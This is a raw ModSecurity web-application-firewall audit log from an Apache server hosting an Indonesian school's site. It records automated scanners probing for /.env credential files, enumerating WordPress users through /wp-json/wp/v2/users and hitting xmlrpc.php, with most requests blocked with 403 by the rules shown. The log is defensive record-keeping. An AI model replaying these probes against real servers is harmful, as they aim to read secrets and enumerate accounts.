Engine-Mode: "ENABLED" --2f26d507-Z-- --67b3dc2b-A-- [29/Apr/2025:18:01:25 +0700] aBCxhSUYsqS7mE9-0zokHgAAAAo 103.236.140.4 34542 103.236.140.4 8181 --67b3dc2b-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --67b3dc2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67b3dc2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924485134901 857 (- - -) Stopwatch2: 1745924485134901 857; combined=336, p1=299, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67b3dc2b-Z-- --c7558779-A-- [29/Apr/2025:18:01:25 +0700] aBCxhSUYsqS7mE9-0zokIAAAAAw 103.236.140.4 34548 103.236.140.4 8181 --c7558779-B-- GET /sites/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c7558779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7558779-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924485935288 919 (- - -) Stopwatch2: 1745924485935288 919; combined=357, p1=315, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7558779-Z-- --e33e4e5f-A-- [29/Apr/2025:18:01:26 +0700] aBCxhhmWB8ZGI9fN-VFUIAAAAIE 103.236.140.4 34550 103.236.140.4 8181 --e33e4e5f-B-- GET /blog/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --e33e4e5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e33e4e5f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924486430877 895 (- - -) Stopwatch2: 1745924486430877 895; combined=381, p1=344, p2=0, p3=0, p4=0, p5=37, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e33e4e5f-Z-- --35e13616-A-- [29/Apr/2025:18:01:27 +0700] aBCxhxmWB8ZGI9fN-VFUIQAAAIw 103.236.140.4 34556 103.236.140.4 8181 --35e13616-B-- GET /system/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --35e13616-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35e13616-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924487312736 886 (- - -) Stopwatch2: 1745924487312736 886; combined=377, p1=338, p2=0, p3=0, p4=0, p5=39, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35e13616-Z-- --f06e603a-A-- [29/Apr/2025:18:01:27 +0700] aBCxhxmWB8ZGI9fN-VFUIwAAAJE 103.236.140.4 34562 103.236.140.4 8181 --f06e603a-B-- GET /public/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --f06e603a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f06e603a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924487819153 849 (- - -) Stopwatch2: 1745924487819153 849; combined=308, p1=273, p2=0, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f06e603a-Z-- --2b43f36e-A-- [29/Apr/2025:18:01:28 +0700] aBCxiBmWB8ZGI9fN-VFUJAAAAJI 103.236.140.4 34564 103.236.140.4 8181 --2b43f36e-B-- GET /shop/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2b43f36e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b43f36e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924488167758 719 (- - -) Stopwatch2: 1745924488167758 719; combined=264, p1=231, p2=0, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b43f36e-Z-- --5f93b442-A-- [29/Apr/2025:21:17:11 +0700] aBDfZyUYsqS7mE9-0zow-wAAABc 103.236.140.4 52248 103.236.140.4 8181 --5f93b442-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.106.105 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.106.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5f93b442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f93b442-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745936231653814 745 (- - -) Stopwatch2: 1745936231653814 745; combined=300, p1=260, p2=0, p3=0, p4=0, p5=39, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f93b442-Z-- --37ee597a-A-- [29/Apr/2025:23:31:19 +0700] aBD-17M38gUEppT2vWNQ2gAAANY 103.236.140.4 60096 103.236.140.4 8181 --37ee597a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --37ee597a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37ee597a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745944279340268 4714 (- - -) Stopwatch2: 1745944279340268 4714; combined=2408, p1=743, p2=1623, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37ee597a-Z-- --1fe13175-A-- [29/Apr/2025:23:31:22 +0700] aBD-2p11ysLXBHLtLPWvaAAAAFc 103.236.140.4 60112 103.236.140.4 8181 --1fe13175-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1fe13175-C-- demo.sayHello --1fe13175-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fe13175-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745944282609092 6813 (- - -) Stopwatch2: 1745944282609092 6813; combined=4914, p1=656, p2=3998, p3=37, p4=41, p5=106, sr=81, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fe13175-Z-- --a9b8e31b-A-- [29/Apr/2025:23:57:09 +0700] aBEE5SUYsqS7mE9-0zo9oAAAABI 103.236.140.4 37820 103.236.140.4 8181 --a9b8e31b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) Accept-Charset: utf-8 --a9b8e31b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9b8e31b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745945829773065 768 (- - -) Stopwatch2: 1745945829773065 768; combined=326, p1=288, p2=0, p3=0, p4=0, p5=38, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9b8e31b-Z-- --b0f16720-A-- [30/Apr/2025:00:02:14 +0700] aBEGFhmWB8ZGI9fN-VFoygAAAJg 103.236.140.4 39056 103.236.140.4 8181 --b0f16720-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50 Accept-Charset: utf-8 --b0f16720-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0f16720-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745946134946387 770 (- - -) Stopwatch2: 1745946134946387 770; combined=325, p1=277, p2=0, p3=0, p4=0, p5=48, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0f16720-Z-- --022b4874-A-- [30/Apr/2025:00:12:53 +0700] aBEIlbM38gUEppT2vWNTLgAAAMQ 103.236.140.4 41506 103.236.140.4 8181 --022b4874-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Accept-Charset: utf-8 --022b4874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --022b4874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745946773522955 894 (- - -) Stopwatch2: 1745946773522955 894; combined=385, p1=338, p2=0, p3=0, p4=0, p5=46, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --022b4874-Z-- --7db13f15-A-- [30/Apr/2025:00:59:02 +0700] aBETZhmWB8ZGI9fN-VFsFwAAAJA 103.236.140.4 52728 103.236.140.4 8181 --7db13f15-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 206.189.95.232 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 206.189.95.232 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --7db13f15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7db13f15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745949542095073 911 (- - -) Stopwatch2: 1745949542095073 911; combined=398, p1=360, p2=0, p3=0, p4=0, p5=38, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7db13f15-Z-- --48e38007-A-- [30/Apr/2025:04:22:06 +0700] aBFC_tBN0baiHx4WjiZRMgAAAFU 103.236.140.4 53246 103.236.140.4 8181 --48e38007-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.192 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --48e38007-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48e38007-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745961726540722 2846 (- - -) Stopwatch2: 1745961726540722 2846; combined=1458, p1=474, p2=943, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48e38007-Z-- --5a1bb735-A-- [30/Apr/2025:04:48:54 +0700] aBFJRjsHLQ2TK6eM3eo3pAAAAII 103.236.140.4 59550 103.236.140.4 8181 --5a1bb735-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.203.63 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.203.63 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5a1bb735-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a1bb735-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745963334917434 781 (- - -) Stopwatch2: 1745963334917434 781; combined=346, p1=310, p2=0, p3=0, p4=0, p5=36, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a1bb735-Z-- --03d29731-A-- [30/Apr/2025:04:54:44 +0700] aBFKpNBN0baiHx4WjiZTCwAAAEA 103.236.140.4 60922 103.236.140.4 8181 --03d29731-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 --03d29731-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03d29731-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745963684435372 736 (- - -) Stopwatch2: 1745963684435372 736; combined=295, p1=259, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03d29731-Z-- --d0a99501-A-- [30/Apr/2025:04:56:30 +0700] aBFLDtBN0baiHx4WjiZTNgAAAEw 103.236.140.4 33104 103.236.140.4 8181 --d0a99501-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel 2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --d0a99501-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0a99501-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745963790858590 840 (- - -) Stopwatch2: 1745963790858590 840; combined=334, p1=294, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0a99501-Z-- --95bfdc38-A-- [30/Apr/2025:05:15:13 +0700] aBFPcdBN0baiHx4WjiZUFAAAAEA 103.236.140.4 37432 103.236.140.4 8181 --95bfdc38-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; G8441) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 YaBrowser/19.1.3.198.00 Mobile Safari/537.36 Accept-Charset: utf-8 --95bfdc38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95bfdc38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745964913052294 824 (- - -) Stopwatch2: 1745964913052294 824; combined=335, p1=300, p2=0, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95bfdc38-Z-- --a19fab66-A-- [30/Apr/2025:05:25:06 +0700] aBFRwj1td-6YjlnYDRJ66gAAABA 103.236.140.4 39738 103.236.140.4 8181 --a19fab66-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close 